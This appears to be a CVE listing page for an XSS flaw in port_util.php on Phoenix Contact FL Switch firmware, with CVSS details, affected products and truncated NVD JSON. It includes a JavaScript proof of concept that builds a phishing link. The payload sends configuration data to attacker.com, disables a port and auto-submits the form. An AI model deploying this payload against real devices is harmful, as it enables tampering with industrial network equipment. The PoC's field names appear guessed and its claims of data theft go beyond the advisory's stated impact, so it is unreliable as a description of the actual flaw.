Security Vulnerability Report
CVE-2025-41749 CVSS 7.1 HIGH

Published: 2025-12-09 16:17:50
Last Modified: 2025-12-19 16:46:12

Description

An XSS vulnerability in port_util.php can be used by an unauthenticated remote attacker to trick an authenticated user into clicking a link provided by the attacker in order to change parameters available via web-based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the HttpOnly flag. Therefore, an attacker is not able to take over the session of an authenticated user.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:phoenixcontact:fl_switch_2008f_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2008f:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2016_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2016:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2105_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2105:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2108_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2108:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:phoenixcontact:fl_switch_2116_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:phoenixcontact:fl_switch_2116:-:*:*:*:*:*:*:* - NOT VULNERABLE
port_util.php (all unpatched versions)
WBM management interface of affected devices

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-41749 PoC - XSS in port_util.php
// This PoC demonstrates how an attacker can inject malicious JavaScript
// through port_util.php to manipulate WBM configuration parameters
const pocUrl = 'http://[TARGET_IP]/port_util.php';

// Malicious payload that steals configuration data and modifies parameters
const xssPayload = `
<script>
  // Steal current configuration
  const config = {
    portSettings: document.querySelectorAll('input[name*="port"]'),
    currentUrl: window.location.href
  };
  // Exfiltrate data to attacker controlled server
  fetch('https://attacker.com/exfil?data=' + btoa(JSON.stringify(config)));
  // Modify port configuration parameters
  document.querySelector('input[name="port_num"]').value = '9999';
  document.querySelector('input[name="port_enabled"]').checked = false;
  // Auto-submit the form
  document.querySelector('form[action*="port_util"]').submit();
</script>
`;

// Generate malicious link for social engineering attack
function generateMaliciousLink() {
  const baseUrl = pocUrl;
  const params = new URLSearchParams({
    port_id: '1' + xssPayload,
    action: 'edit'
  });
  return `${baseUrl}?${params.toString()}`;
}

// Display the malicious link
console.log('Malicious Link for Social Engineering Attack:');
console.log(generateMaliciousLink());
console.log('\nAttack Steps:');
console.log('1. Send this link to authenticated WBM user');
console.log('2. When user clicks, XSS payload executes in their browser');
console.log('3. Attacker can modify device configuration parameters');
console.log('4. Modified configuration is saved to the device');

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-41749", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:50.230", "lastModified": "2025-12-19T16:46:12.343", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An XSS vulnerability in port_util.php can be used by an unauthenticated remote attacker to trick an authenticated user to click on the link provided by the attacker in order to change parameters available via web based management (WBM). The vulnerability does not provide access to system-level resources such as operating system internals or privileged functions. Access is limited to device configuration parameters that are available in the context of the web application. The session cookie is secured by the httpOnly Flag. Therefore an attacker is not able to take over the session of an authenticated user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2008f_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "DBFA9AC1-51A3-4516-81E9-8044EFB9E436"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2008f:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D3F1820-AF71-4D9A-BC63-1B886C739FD0"}]}]}, {"operator": "AND", "nodes": 
[{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2016_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "E2224C43-207D-4E66-96CE-7994EA2F0C6B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2016:-:*:*:*:*:*:*:*", "matchCriteriaId": "5C4DFBF9-2A05-4888-B457-E29617B74C95"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2105_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "4E7EF0AD-28B3-4085-B631-EDD603BCAC37"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2105:-:*:*:*:*:*:*:*", "matchCriteriaId": "B7A15734-B479-4E6F-923A-F838BDA51907"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2108_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "946C2D9E-B9AD-4F30-9486-9CF46A1678D4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2108:-:*:*:*:*:*:*:*", "matchCriteriaId": "D02E0265-C083-4434-A8A5-F886D8877CA6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2116_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "22BB4729-7E6A-4D5B-A92C-E560482A6A6C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2116:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF61AD7B-F835-421B-BA94-375A3C5F5A22"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:phoenixcontact:fl_switch_2204-2tc-2sfx_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "AE050F85-6AF2-4C75-BD8E-E1FA94327C35"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2204-2tc-2sfx:-:*:*:*:*:*:*:*", "matchCriteriaId": "360C4F7D-B4E8-4D7F-BFF5-AB7490AAD7F7"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:fl_switch_2205_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.50", "matchCriteriaId": "172C2878-FE3F-4CFE-8E22-BF20494DD9C7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:phoenixcontact:fl_switch_2205:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B451A6F-C3D6-428B-B465-DED2FE4BFD3A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:phoenixcontact:f ... (truncated)